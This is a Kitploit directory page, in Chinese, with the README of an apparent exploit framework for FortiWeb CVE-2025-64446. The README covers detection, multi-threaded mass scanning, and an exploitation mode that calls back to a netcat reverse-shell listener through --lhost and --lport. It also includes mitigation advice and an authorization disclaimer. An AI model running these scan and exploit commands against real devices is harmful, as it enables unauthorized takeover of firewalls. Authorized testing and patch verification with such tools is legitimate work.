Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — FortiWeb CVE-2025-64446 漏洞的安全研究工具。自动化利用框架,具备高级日志记录、实时指标、代理调试和专业报告功能。包含重试逻辑、多线程和可配置设置。仅限授权安全测试使用。CVSS 9.8 严重级别。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

FortiWeb CVE-2025-64446 漏洞的安全研究工具。自动化利用框架,具备高级日志记录、实时指标、代理调试和专业报告功能。包含重试逻辑、多线程和可配置设置。仅限授权安全测试使用。CVSS 9.8 严重级别。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
121个月前尚未审核
分享

FortiWeb CVE-2025-64446 RCE 漏洞利用工具

Python License CVSS CVE Status Version

专业安全研究与漏洞评估框架

安装 · 快速开始 · 使用指南 · 架构 · CLI 参考 · 法律与道德免责声明


概述

FortiWeb Research Tool 是一个 Python 评估框架,用于对 CVE-2025-64446 进行授权检测与分析。该漏洞是一个影响 FortiWeb Web 应用防火墙设备的严重预认证远程代码执行漏洞。

属性详情
作者Sudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8(严重)
类型身份验证绕过 + 路径遍历 → 任意文件上传 → RCE
受影响版本低于 7.6.7 / 7.8.7 / 8.0.2 的构建版本(请以官方公告为准)
修复方案升级到已修复的 FortiWeb 版本
语言Python 3.7+
入口点exploit.py

关键功能

模式参数用途
检测--detect-only非利用性漏洞指标检测
安全 / 只读--safe-mode跳过会修改状态的利用步骤
批量扫描--targets + --scan-mode并行多目标评估
漏洞利用--target + --lhost仅在授权实验室中执行受控攻击链
演练--dry-run不实际应用更改,演练完整流程
报告--output-dir生成 JSON + HTML 评估报告

漏洞摘要

字段值
CVE 标识符CVE-2025-64446
CVSS 评分9.8(严重)
影响成功利用后可完全控制系统
修复升级到 7.6.7、7.8.7、8.0.2 或更高版本

在确定评估范围之前,请务必对照 Fortinet PSIRT 确认受影响/已修复版本。


📸 截图

使用示例扫描结果
仪表盘扫描结果
HTML 输出
终端输出

安装

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

依赖项

包作用
requests, urllib3HTTP 客户端
rich, colorama, tqdm终端界面与进度显示
pyyaml加载 config.yaml

可选(开发):pytest、black、flake8、mypy、python-dotenv — 参见 requirements.txt。


快速开始

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

注意: 利用模式需要 --lhost。如果不打算运行完整攻击链,请使用 --detect-only 或 --safe-mode。


使用指南

检测模式

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

检测功能会评估目标可达性、版本提示、API 暴露面、路径遍历指标、身份验证绕过信号以及上传端点的可访问性,并根据这些指标将风险等级划分为:严重 / 高危 / 中危 / 低危。

批量扫描

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager 通过线程池运行 FortiWebScanner 工作线程,输出 Rich 汇总表格,并生成 scan_report.json / scan_report.html 报告。

利用模式(仅限授权实验室)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

配置文件

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

命令行参数会覆盖从 YAML 加载的配置值。


架构

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
组件职责
FortiWebScanner目标可达性、版本、CVE 指标检测
ScannerManager并行扫描、JSON/HTML 汇总、摘要表格
FortiWebExploit配置驱动的会话、重试、指标、报告、可选的利用路径
LogManager结构化文件日志 + 彩色控制台输出

单目标高层流程:

  1. 横幅 / 日志初始化
  2. 可达性及版本探测
  3. 指标检测(非检测/安全模式下执行完整攻击链)
  4. 在 reports/ 下生成 JSON + HTML 报告
  5. 必要时进行清理

功能特性

检测

  • 针对管理 API 路径的路径遍历指标检测
  • 身份验证绕过信号检测
  • 通过常见状态/版本端点探测 FortiWeb 版本
  • API 端点暴露面映射
  • 文件上传端点可访问性检测
  • 综合指标风险评分

报告与可观测性

  • 带时间戳的 JSON 和 HTML 报告
  • 每次请求的指标(状态、延迟、成功率)
  • 独立日志:exploit.log、errors.log、requests.log

操作控制

  • 多线程批量扫描(--threads)
  • 支持 HTTP/HTTPS 代理(例如 Burp)
  • 可配置重试次数/延迟(默认:3 次 / 2 秒)
  • 自定义 User-Agent、超时、SSL 验证开关(--no-verify)
  • 通过 Colorama + Rich 实现彩色控制台输出

生成输出

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

示例 JSON 报告(检测模式)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

命令参考

root@kitploit:~
python3 exploit.py [OPTIONS]
选项说明
--target URL单个 FortiWeb 基础 URL
--targets FILE换行分隔的目标列表文件
--lhost IP监听主机(利用模式必需)
--lport PORT监听端口(默认:4444)
--config FILEYAML 配置文件
--detect-only仅检测;跳过利用链
--scan-mode多目标扫描(需要 --targets)
--safe-mode只读;跳过修改性步骤
--dry-run演练模式,不实际应用更改
--timeout SEC请求超时时间(默认:15)
--threads N扫描工作线程数(默认:5)
--proxy URLHTTP 代理
--user-agent STR自定义 User-Agent
-v, --verbose详细日志 / 控制台输出
--no-verify禁用 TLS 证书验证
--output-dir DIR报告目录(默认:reports)
--log-dir DIR日志目录(默认:logs)
-h, --help显示帮助信息

项目结构

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

缓解指南

  1. 将 FortiWeb 升级到已修复版本(7.6.7+、7.8.7+、8.0.2+,或遵循当前的 PSIRT 建议)。
  2. 将管理接口限制在可信网络 / 跳板机范围内。
  3. 监控身份验证及维护 API 活动,及时发现异常访问。
  4. 在确认暴露后轮换凭据并检查完整性。
  5. 修复后重新运行 --detect-only / --safe-mode,以验证修复效果。

法律与道德免责声明

本工具仅用于经授权的安全测试、研究与教育。

  • 仅可用于您拥有或已获得明确书面授权进行测试的系统
  • 遵循负责任披露和漏洞赏金计划规则
  • 禁止用于未经授权的访问、破坏或非法活动

使用本软件即表示您确认已获得授权、不会滥用该工具,并对自己的一切行为承担全部责任。作者不对滥用行为负责。

有关本项目的私有漏洞报告事宜,请参阅 SECURITY.md。


参考资料

  • Fortinet PSIRT
  • 公告:FG-IR-25-64446
  • 补丁下载
  • NVD: CVE-2025-64446

贡献指南

  1. Fork 本仓库
  2. 创建分支:git checkout -b feature/your-change
  3. 使用清晰的信息提交
  4. 推送并提交 Pull Request

请仅在授权实验室环境中验证更改,并避免提交真实目标数据、Cookie 或凭据。


许可证

MIT 许可证 — 参见 LICENSE。

版权所有(c)2026 Sudeepa Wanigarathna


作者与支持

作者Sudeepa Wanigarathna
问题反馈本仓库的 GitHub Issues
安全参见 SECURITY.md · [email protected]

仅限授权研究 · FortiWeb CVE-2025-64446

返回顶部

下载工具